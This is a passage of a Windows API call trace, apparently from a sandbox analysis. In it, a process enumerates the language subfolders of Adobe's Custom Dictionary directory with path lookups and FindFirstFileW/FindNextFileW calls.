lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all", lpFilePart=0x0) returned 0x5c [0050.073] GetLastError () returned 0x12 [0050.073] SetErrorMode (uMode=0x1) returned 0x0 [0050.074] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.075] GetLastError () returned 0x12 [0050.076] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.076] GetLastError () returned 0x12 [0050.076] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.076] GetLastError () returned 0x12 [0050.076] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.076] SetErrorMode (uMode=0x0) returned 0x1 [0050.076] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all", lpFilePart=0x0) returned 0x5c [0050.076] GetLastError () returned 0x12 [0050.076] SetErrorMode (uMode=0x1) returned 0x0 [0050.076] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.076] GetLastError () returned 0x12 [0050.076] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.076] GetLastError () returned 0x12 [0050.076] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.076] GetLastError () returned 0x12 [0050.076] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.076] SetErrorMode (uMode=0x0) returned 0x1 [0050.076] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ara", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ara", lpFilePart=0x0) returned 0x5c [0050.076] GetLastError () returned 0x12 [0050.076] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.076] GetLastError () returned 0x12 [0050.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.076] GetLastError () returned 0x12 [0050.076] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ara", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ara", lpFilePart=0x0) returned 0x5c [0050.076] GetLastError () returned 0x12 [0050.076] SetErrorMode (uMode=0x1) returned 0x0 [0050.076] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ara\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.077] GetLastError () returned 0x12 [0050.077] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.077] GetLastError () returned 0x12 [0050.077] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.077] GetLastError () returned 0x12 [0050.077] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.077] SetErrorMode (uMode=0x0) returned 0x1 [0050.077] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ara", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ara", lpFilePart=0x0) returned 0x5c [0050.077] GetLastError () returned 0x12 [0050.077] SetErrorMode (uMode=0x1) returned 0x0 [0050.077] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ara\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.077] GetLastError () returned 0x12 [0050.077] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.077] GetLastError () returned 0x12 [0050.077] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.078] GetLastError () returned 0x12 [0050.078] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.078] SetErrorMode (uMode=0x0) returned 0x1 [0050.078] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt", lpFilePart=0x0) returned 0x5c [0050.078] GetLastError () returned 0x12 [0050.078] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.078] GetLastError () returned 0x12 [0050.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.078] GetLastError () returned 0x12 [0050.078] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt", lpFilePart=0x0) returned 0x5c [0050.078] GetLastError () returned 0x12 [0050.078] SetErrorMode (uMode=0x1) returned 0x0 [0050.078] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.078] GetLastError () returned 0x12 [0050.078] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.078] GetLastError () returned 0x12 [0050.078] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.078] GetLastError () returned 0x12 [0050.078] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.078] SetErrorMode (uMode=0x0) returned 0x1 [0050.078] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt", lpFilePart=0x0) returned 0x5c [0050.078] GetLastError () returned 0x12 [0050.078] SetErrorMode (uMode=0x1) returned 0x0 [0050.078] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.078] GetLastError () returned 0x12 [0050.078] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.078] GetLastError () returned 0x12 [0050.079] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.079] GetLastError () returned 0x12 [0050.079] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.079] SetErrorMode (uMode=0x0) returned 0x1 [0050.079] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz", lpFilePart=0x0) returned 0x5c [0050.079] GetLastError () returned 0x12 [0050.079] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.079] GetLastError () returned 0x12 [0050.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.079] GetLastError () returned 0x12 [0050.079] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz", lpFilePart=0x0) returned 0x5c [0050.079] GetLastError () returned 0x12 [0050.079] SetErrorMode (uMode=0x1) returned 0x0 [0050.079] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.080] GetLastError () returned 0x12 [0050.080] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.080] GetLastError () returned 0x12 [0050.080] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.080] GetLastError () returned 0x12 [0050.080] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.080] SetErrorMode (uMode=0x0) returned 0x1 [0050.080] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz", lpFilePart=0x0) returned 0x5c [0050.080] GetLastError () returned 0x12 [0050.080] SetErrorMode (uMode=0x1) returned 0x0 [0050.080] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.080] GetLastError () returned 0x12 [0050.080] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.080] GetLastError () returned 0x12 [0050.080] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.080] GetLastError () returned 0x12 [0050.080] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.080] SetErrorMode (uMode=0x0) returned 0x1 [0050.080] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\bul", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\bul", lpFilePart=0x0) returned 0x5c [0050.080] GetLastError () returned 0x12 [0050.080] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.080] GetLastError () returned 0x12 [0050.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.080] GetLastError () returned 0x12 [0050.080] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\bul", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\bul", lpFilePart=0x0) returned 0x5c [0050.081] GetLastError () returned 0x12 [0050.081] SetErrorMode (uMode=0x1) returned 0x0 [0050.081] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\bul\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.081] GetLastError () returned 0x12 [0050.081] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.081] GetLastError () returned 0x12 [0050.081] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.081] GetLastError () returned 0x12 [0050.081] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.081] SetErrorMode (uMode=0x0) returned 0x1 [0050.081] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\bul", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\bul", lpFilePart=0x0) returned 0x5c [0050.081] GetLastError () returned 0x12 [0050.081] SetErrorMode (uMode=0x1) returned 0x0 [0050.081] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\bul\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.082] GetLastError () returned 0x12 [0050.082] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.082] GetLastError () returned 0x12 [0050.082] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.082] GetLastError () returned 0x12 [0050.082] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.082] SetErrorMode (uMode=0x0) returned 0x1 [0050.082] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\can", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\can", lpFilePart=0x0) returned 0x5c [0050.082] GetLastError () returned 0x12 [0050.082] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.082] GetLastError () returned 0x12 [0050.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.082] GetLastError () returned 0x12 [0050.082] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\can", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\can", lpFilePart=0x0) returned 0x5c [0050.082] GetLastError () returned 0x12 [0050.082] SetErrorMode (uMode=0x1) returned 0x0 [0050.082] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\can\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.083] GetLastError () returned 0x12 [0050.083] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.083] GetLastError () returned 0x12 [0050.083] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.083] GetLastError () returned 0x12 [0050.083] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.083] SetErrorMode (uMode=0x0) returned 0x1 [0050.083] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\can", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\can", lpFilePart=0x0) returned 0x5c [0050.083] GetLastError () returned 0x12 [0050.083] SetErrorMode (uMode=0x1) returned 0x0 [0050.083] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\can\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.083] GetLastError () returned 0x12 [0050.083] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.083] GetLastError () returned 0x12 [0050.083] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.083] GetLastError () returned 0x12 [0050.083] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.083] SetErrorMode (uMode=0x0) returned 0x1 [0050.083] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cfr", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cfr", lpFilePart=0x0) returned 0x5c [0050.083] GetLastError () returned 0x12 [0050.083] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.083] GetLastError () returned 0x12 [0050.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.083] GetLastError () returned 0x12 [0050.083] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cfr", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cfr", lpFilePart=0x0) returned 0x5c [0050.083] GetLastError () returned 0x12 [0050.083] SetErrorMode (uMode=0x1) returned 0x0 [0050.083] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cfr\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.084] GetLastError () returned 0x12 [0050.084] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.084] GetLastError () returned 0x12 [0050.084] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.084] GetLastError () returned 0x12 [0050.084] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.084] SetErrorMode (uMode=0x0) returned 0x1 [0050.084] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cfr", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cfr", lpFilePart=0x0) returned 0x5c [0050.084] GetLastError () returned 0x12 [0050.084] SetErrorMode (uMode=0x1) returned 0x0 [0050.084] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cfr\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.084] GetLastError () returned 0x12 [0050.084] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.084] GetLastError () returned 0x12 [0050.084] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.084] GetLastError () returned 0x12 [0050.084] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.084] SetErrorMode (uMode=0x0) returned 0x1 [0050.084] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ctl", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ctl", lpFilePart=0x0) returned 0x5c [0050.084] GetLastError () returned 0x12 [0050.084] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.084] GetLastError () returned 0x12 [0050.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.084] GetLastError () returned 0x12 [0050.084] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ctl", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ctl", lpFilePart=0x0) returned 0x5c [0050.084] GetLastError () returned 0x12 [0050.084] SetErrorMode (uMode=0x1) returned 0x0 [0050.085] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ctl\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.085] GetLastError () returned 0x12 [0050.085] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.085] GetLastError () returned 0x12 [0050.085] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.085] GetLastError () returned 0x12 [0050.085] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.085] SetErrorMode (uMode=0x0) returned 0x1 [0050.085] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ctl", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ctl", lpFilePart=0x0) returned 0x5c [0050.085] GetLastError () returned 0x12 [0050.085] SetErrorMode (uMode=0x1) returned 0x0 [0050.086] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\ctl\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.086] GetLastError () returned 0x12 [0050.086] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.086] GetLastError () returned 0x12 [0050.086] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.086] GetLastError () returned 0x12 [0050.086] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.086] SetErrorMode (uMode=0x0) returned 0x1 [0050.086] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cze", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cze", lpFilePart=0x0) returned 0x5c [0050.086] GetLastError () returned 0x12 [0050.086] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.086] GetLastError () returned 0x12 [0050.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.086] GetLastError () returned 0x12 [0050.086] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cze", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cze", lpFilePart=0x0) returned 0x5c [0050.086] GetLastError () returned 0x12 [0050.086] SetErrorMode (uMode=0x1) returned 0x0 [0050.086] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cze\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.086] GetLastError () returned 0x12 [0050.086] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.086] GetLastError () returned 0x12 [0050.086] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.086] GetLastError () returned 0x12 [0050.087] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.087] SetErrorMode (uMode=0x0) returned 0x1 [0050.087] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cze", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\cze", 